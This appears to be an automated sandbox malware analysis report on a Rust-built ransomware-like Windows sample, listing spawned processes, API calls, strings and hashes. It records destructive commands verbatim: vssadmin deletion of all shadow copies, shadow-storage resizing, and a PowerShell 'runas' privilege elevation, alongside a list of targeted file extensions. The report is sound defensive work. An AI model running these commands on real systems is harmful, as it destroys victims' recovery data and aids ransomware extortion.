Analysis Process: conhost.exe PID: 6520 Parent PID: 5996

General

Start time:	12:57:19
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 492 Parent PID: 5996

General

Start time:	12:57:22
Start date:	11/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4660 Parent PID: 492

General

Start time:	12:57:22
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 4684 Parent PID: 492

General

Start time:	12:57:22
Start date:	11/04/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin.exe Delete Shadows /All /Quiet
Imagebase:	0x7ff778120000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 7112 Parent PID: 492

General

Start time:	12:57:24
Start date:	11/04/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Imagebase:	0x7ff778120000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6240 Parent PID: 3492

General

Start time:	12:57:31
Start date:	11/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5180 Parent PID: 6240

General

Start time:	12:57:32
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1584 Parent PID: 6240

General

Start time:	12:57:35
Start date:	11/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2792 Parent PID: 1584

General

Start time:	12:57:35
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: IJht2pqbVh.exe PID: 7096 Parent PID: 5920 IJht2pqbVh.exeCOMMON

Executed Functions

Function 00007FF606E66C70, Relevance: 70.2, APIs: 38, Strings: 7, Instructions: 2704COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E677C2
memmove.VCRUNTIME140 ref: 00007FF606E67879

Strings

exeNULcouldn't generate random bytes: , xrefs: 00007FF606E68CDD
AcquireSRWLockExclusive, xrefs: 00007FF606E69C48, 00007FF606E69EC9
assertion failed: self.len() < CAPACITY/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF606E6A12F, 00007FF606E6A14C
internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs, xrefs: 00007FF606E6A05C
assertion failed: self.height > 0, xrefs: 00007FF606E6A0D1
ReleaseSRWLockExclusive, xrefs: 00007FF606E69C8A, 00007FF606E69F71
called `Option::unwrap()` on a `None` value, xrefs: 00007FF606E6A079, 00007FF606E6A0B4, 00007FF606E6A0F5, 00007FF606E6A16D

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$assertion failed: self.height > 0$assertion failed: self.len() < CAPACITY/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\node.rs$called `Option::unwrap()` on a `None` value$exeNULcouldn't generate random bytes: $internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs
API String ID: 2162964266-435946001
Opcode ID: bedcb23b726c48819bf3876c5073131d7c96c2bba8a88c89eb761cd454e7e82e
Instruction ID: c4e26e8c5ed0453db8c8f55334419f5a2aed77d51dd95ceed8b9fae1b16da67c
Opcode Fuzzy Hash: bedcb23b726c48819bf3876c5073131d7c96c2bba8a88c89eb761cd454e7e82e
Instruction Fuzzy Hash: B7637F72A09BC685EB658F25D8443F933A0FB58798F644235DF9D4BB99EF399281C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5CDC0, Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 621COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF606E5CDFF
CreateEventW.KERNEL32 ref: 00007FF606E5CE6A
CreateEventW.KERNEL32 ref: 00007FF606E5CEDD
WaitForMultipleObjects.KERNEL32 ref: 00007FF606E5CF71

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E5D62B, 00007FF606E5D689, 00007FF606E5D706

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateEvent$CloseHandleMultipleObjectsWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1194628698-2333694755
Opcode ID: 63b37d8f5d0f4b84016520f3b60ceb9c4aaa9be56ad6d4be8355d7ca077ba206
Instruction ID: ac275480640b54e0c17f3efd57bfda3c3052acd7b15764114207ede1668b39e8
Opcode Fuzzy Hash: 63b37d8f5d0f4b84016520f3b60ceb9c4aaa9be56ad6d4be8355d7ca077ba206
Instruction Fuzzy Hash: A0429F32A1CB9289FB509F65D8443BD27A1FF447D8F244136EA4D87B89DF7AE4828344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E9DDD0, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 152libraryloadernetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF606E9DDF8
WSACleanup.WS2_32 ref: 00007FF606E9DE13
GetModuleHandleA.KERNEL32 ref: 00007FF606E9DE5C
GetProcAddress.KERNEL32 ref: 00007FF606E9DE90
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF606E9DEAA
LoadLibraryA.KERNEL32 ref: 00007FF606E9DECD
GetProcAddress.KERNEL32 ref: 00007FF606E9DEEA
LoadLibraryExA.KERNELBASE ref: 00007FF606E9DF00
GetSystemDirectoryA.KERNEL32 ref: 00007FF606E9DF16
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF606E9DF2E
GetSystemDirectoryA.KERNEL32 ref: 00007FF606E9DF42
LoadLibraryA.KERNEL32 ref: 00007FF606E9DFB0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF606E9DFBC
GetProcAddress.KERNEL32 ref: 00007FF606E9DFF0
QueryPerformanceFrequency.KERNEL32 ref: 00007FF606E9E02D

Strings

LoadLibraryExA, xrefs: 00007FF606E9DE7E
if_nametoindex, xrefs: 00007FF606E9DFE6
iphlpapi.dll, xrefs: 00007FF606E9DE96
kernel32, xrefs: 00007FF606E9DE4B
AddDllDirectory, xrefs: 00007FF606E9DEE0

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
API String ID: 2882270050-2794540096
Opcode ID: ed6526a9c066f6832d3423a5ca13f58926c7bbc612f5d2a82726070a7cf98017
Instruction ID: 077bafc6db9742a5807dc626442dee87a0398da8ec89c29655ec5f71405ec0c9
Opcode Fuzzy Hash: ed6526a9c066f6832d3423a5ca13f58926c7bbc612f5d2a82726070a7cf98017
Instruction Fuzzy Hash: 5661BE31E0DB9685FB659B21E8113B977A1FF84B98F684431CA4E83394EF2EE506C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E14D3F, Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 1840COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF606E1550D

Strings

DECRYPTING FILES..., xrefs: 00007FF606E18650, 00007FF606E18EF4
a Display implementation returned an error unexpectedly/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs, xrefs: 00007FF606E19F81
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E19DC9
Error, xrefs: 00007FF606E1536B, 00007FF606E15BC4

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcmp
String ID: DECRYPTING FILES...$Error$a Display implementation returned an error unexpectedly/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs$called `Result::unwrap()` on an `Err` value
API String ID: 1475443563-111709682
Opcode ID: 493b7349b0129c576ab3b55f3230e5602cbfd32904a4f1492a7fe8fd342c7012
Instruction ID: 32a6f3ba350ab4888e90c2b1f0978dbcac1982043b6b1d5604e1b97df71b5215
Opcode Fuzzy Hash: 493b7349b0129c576ab3b55f3230e5602cbfd32904a4f1492a7fe8fd342c7012
Instruction Fuzzy Hash: 9243F472608BC18DE7328F24D8983E937A4FB5578CF544125DB8C4EA9ADF7AA385C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E22CB0, Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 498COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E23244
memmove.VCRUNTIME140 ref: 00007FF606E23373

Strings

pptx, xrefs: 00007FF606E23016
xlsx, xrefs: 00007FF606E22EEB
docx, xrefs: 00007FF606E22DC0
pdfdocxdoctxtxlsxlsxodtodspptpptxpngjpgmp3mp4.wintenzz, xrefs: 00007FF606E22D62

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: docx$pdfdocxdoctxtxlsxlsxodtodspptpptxpngjpgmp3mp4.wintenzz$pptx$xlsx
API String ID: 2162964266-1063182948
Opcode ID: ca2dea2ec6162dab292119464970e4fc24c96584054de5432e2a9391cfe92098
Instruction ID: e55a5a7136bb3d3702c710fe12401cdb03b5d33a0423e74ecfdf57efa1835459
Opcode Fuzzy Hash: ca2dea2ec6162dab292119464970e4fc24c96584054de5432e2a9391cfe92098
Instruction Fuzzy Hash: B522B225A0D79388FF559F21D4502B827A2EF45B84F648436EA4E87BD5EF3EE985C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E64F30, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E65096
memmove.VCRUNTIME140 ref: 00007FF606E65125
GetLastError.KERNEL32 ref: 00007FF606E65139

Strings

*advancing IoSlice beyond its lengthlibrary\std\src\sys\windows\io.rs, xrefs: 00007FF606E65013

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastmemmovememset
String ID: *advancing IoSlice beyond its lengthlibrary\std\src\sys\windows\io.rs
API String ID: 4234947236-2463052000
Opcode ID: 8b7e6cd3eeb314c1a71a8c4414c5129db354128a83ef79b1a9265bc002466ab4
Instruction ID: 14f4e853dc8ca5be8635fef0da8bef1f541c720606c29f5db54ac85eb0154c1c
Opcode Fuzzy Hash: 8b7e6cd3eeb314c1a71a8c4414c5129db354128a83ef79b1a9265bc002466ab4
Instruction Fuzzy Hash: E971A322B09B9184FB219F65E8487F823A1BF457D8F544534EF5C8BBC5EF3AA6858340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E33E40, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00007FF606E33E7A

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 6db1d20625e9171d0212c0435e695d2219bb51b47d165a292bf2fe7e720f83de
Instruction ID: 645562656d31b506674b9e9e8ee0a3d345f609dce77e3ddaaeaaf96f90406c09
Opcode Fuzzy Hash: 6db1d20625e9171d0212c0435e695d2219bb51b47d165a292bf2fe7e720f83de
Instruction Fuzzy Hash: 37113D32A09BC198F7719F25EC447D96365EB887B8F644322CA6C57AD8DF799286C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E33F50, Relevance: 1.5, APIs: 1, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228a25030755e01b68e696c52f542a880f0459f079f2f808b7cc62260ee44143
Instruction ID: 0bad0ec576ce0dee9dee05d3fc8000d27c112dab148da6c78de2fff382ca80d1
Opcode Fuzzy Hash: 228a25030755e01b68e696c52f542a880f0459f079f2f808b7cc62260ee44143
Instruction Fuzzy Hash: C9818752B0D762C6FB348606E6493BA22D0EB647C0F244436DE8EC7BD5ED6EE581D301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E9DC30, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128librarystringloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00007FF606EB694A,?,?,?,?,00007FF606E9DE3B), ref: 00007FF606E9DC44
GetProcAddress.KERNEL32(?,?,?,?,00007FF606E9DE3B), ref: 00007FF606E9DC69
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00007FF606E9DE3B), ref: 00007FF606E9DC7C

Strings

LoadLibraryExA, xrefs: 00007FF606E9DC5A
kernel32, xrefs: 00007FF606E9DC3D
AddDllDirectory, xrefs: 00007FF606E9DCC3

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 27745253-3327535076
Opcode ID: 820f31f80df61a7f8b6ee505da82ae800b9629960f52e39176687646386c8dfd
Instruction ID: d1bdab983f7b7face515ab67c7e86ff2115da2b2583d6b427cbe68b8338ec719
Opcode Fuzzy Hash: 820f31f80df61a7f8b6ee505da82ae800b9629960f52e39176687646386c8dfd
Instruction Fuzzy Hash: 7E41E712B0DB5286FB158F16A91017967A1EF86FE5F288130CF1E87794EE3ED586C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E13012, Relevance: 19.4, APIs: 11, Strings: 1, Instructions: 1358COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E13D2C

Strings

powershell-VerbrunasStart-Process, xrefs: 00007FF606E14129, 00007FF606E146B5, 00007FF606E14A6B

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: powershell-VerbrunasStart-Process
API String ID: 2162964266-217301037
Opcode ID: a4e44d034dce283bda476a4d33b308dc95ff17ff2c1a05fa85dda9bbcedce9be
Instruction ID: f078e9b1e1ceb573618039a4ddec47f031417390532ce261f6c312c407ead572
Opcode Fuzzy Hash: a4e44d034dce283bda476a4d33b308dc95ff17ff2c1a05fa85dda9bbcedce9be
Instruction Fuzzy Hash: B4032572608BC18DEB368F25D8983E927A4EB1578CF544025DB4C4FB9ADF7AA385C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E642F0, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 262fileCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E647E3
FindNextFileW.KERNEL32 ref: 00007FF606E647EE
FindNextFileW.KERNEL32 ref: 00007FF606E64822
memmove.VCRUNTIME140 ref: 00007FF606E6487F
memmove.VCRUNTIME140 ref: 00007FF606E648A2
GetLastError.KERNEL32 ref: 00007FF606E648A9
GetLastError.KERNEL32 ref: 00007FF606E648BC

Strings

., xrefs: 00007FF606E6482F

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileFindLastNextmemmove$memset
String ID: .
API String ID: 2525592065-248832578
Opcode ID: e5b3489b5b720fb443acb1a1ee77f6c404a62f1d15093a3244f151bb5af09aed
Instruction ID: c67bc28d28ee2655fde0331a3e1260ce04b4e2c228a1688e002f2a6803c02eee
Opcode Fuzzy Hash: e5b3489b5b720fb443acb1a1ee77f6c404a62f1d15093a3244f151bb5af09aed
Instruction Fuzzy Hash: 8AF11D12D0DBC591F2374B2896013F9A3A4FFE9359F04A215DFD812966EF79A2E58700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E1217B, Relevance: 11.0, APIs: 4, Strings: 3, Instructions: 527COMMON

Download Yara Rule

Strings

delsrc\main.rs, xrefs: 00007FF606E126B3
powershell-VerbrunasStart-Process, xrefs: 00007FF606E122E6
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E12A1B, 00007FF606E12A85

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: called `Result::unwrap()` on an `Err` value$delsrc\main.rs$powershell-VerbrunasStart-Process
API String ID: 0-3008156810
Opcode ID: 4bcb840d2fd1a67a7b259e3bd8cf763f66849ccf39f9a4b4e2520d5bef8902df
Instruction ID: 3fc31c6ce65ba7cb5e4f55fe57c5d662fdf115d827294b878ddb1dd8685b60a1
Opcode Fuzzy Hash: 4bcb840d2fd1a67a7b259e3bd8cf763f66849ccf39f9a4b4e2520d5bef8902df
Instruction Fuzzy Hash: 12328132A0CB9588EB219F65DC453E923A1FF44798F648131DF4D9B799EF3AD2859300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E62010, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 113threadCOMMON

Download Yara Rule

APIs

SetThreadStackGuarantee.KERNEL32 ref: 00007FF606E62059
SetThreadStackGuarantee.KERNELBASE ref: 00007FF606E6208B
GetLastError.KERNEL32 ref: 00007FF606E62091

Strings

failed to reserve stack space for exception handlinglibrary\std\src\sys\windows\stack_overflow.rs, xrefs: 00007FF606E62196
SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs, xrefs: 00007FF606E62061
failed to install exception handler, xrefs: 00007FF606E6216B

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: GuaranteeStackThread$ErrorLast
String ID: SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs$failed to install exception handler$failed to reserve stack space for exception handlinglibrary\std\src\sys\windows\stack_overflow.rs
API String ID: 3709220871-1169643954
Opcode ID: 12568d91416e6eb8f6be633b97627b36ebf2118dbe82b7fdf46c9f82823b0848
Instruction ID: 1a2365b2f4108f7112ab49decd6ff9a369e7b302d35b5c8861cc8ffa9683a6a2
Opcode Fuzzy Hash: 12568d91416e6eb8f6be633b97627b36ebf2118dbe82b7fdf46c9f82823b0848
Instruction Fuzzy Hash: 17514C62F0DB5289FB10DB60E8502EC27B1AF44798F644035EF0D93799EE3EA686C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5CCB0, Relevance: 10.6, APIs: 7, Instructions: 68synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF606E5CD12
WaitForSingleObject.KERNEL32 ref: 00007FF606E5CD1F
GetLastError.KERNEL32 ref: 00007FF606E5CD28
CloseHandle.KERNEL32 ref: 00007FF606E5CD6B
CloseHandle.KERNEL32 ref: 00007FF606E5CD78
CloseHandle.KERNEL32 ref: 00007FF606E5CD85

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$ErrorLastObjectSingleWait
String ID:
API String ID: 1454876536-0
Opcode ID: 81436e69b8987f937357979d2099fcc8b04a1286958744e2fc273cdcae0adafe
Instruction ID: 065fe362376a0e7c9baff2dea3a446236b12d312df618949b862420b5e3d2276
Opcode Fuzzy Hash: 81436e69b8987f937357979d2099fcc8b04a1286958744e2fc273cdcae0adafe
Instruction Fuzzy Hash: AF21672260C74182EA609B11E55176AAB90EB45BA4F344535EE9EC7795DF3EE481CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E36C80, Relevance: 7.8, APIs: 6, Instructions: 341COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E36DC7
memmove.VCRUNTIME140 ref: 00007FF606E36EB0
memmove.VCRUNTIME140 ref: 00007FF606E36F1C
memmove.VCRUNTIME140 ref: 00007FF606E36F59
memmove.VCRUNTIME140 ref: 00007FF606E3717D
memmove.VCRUNTIME140 ref: 00007FF606E371BB

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: d0847b3b8f40113344336b5ab78708e9f1009ef4dffaced32eb1ced32c75c5a8
Instruction ID: 5fd6af072f42f38b15af66c8314c6832c6e9c78ffbda8109dd2333d63b7a8e35
Opcode Fuzzy Hash: d0847b3b8f40113344336b5ab78708e9f1009ef4dffaced32eb1ced32c75c5a8
Instruction Fuzzy Hash: 21025C62A09BC198EB71DF25D8443E933A0FB5878CF505226DF4D4BA9ADF39E295C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606EB6910, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

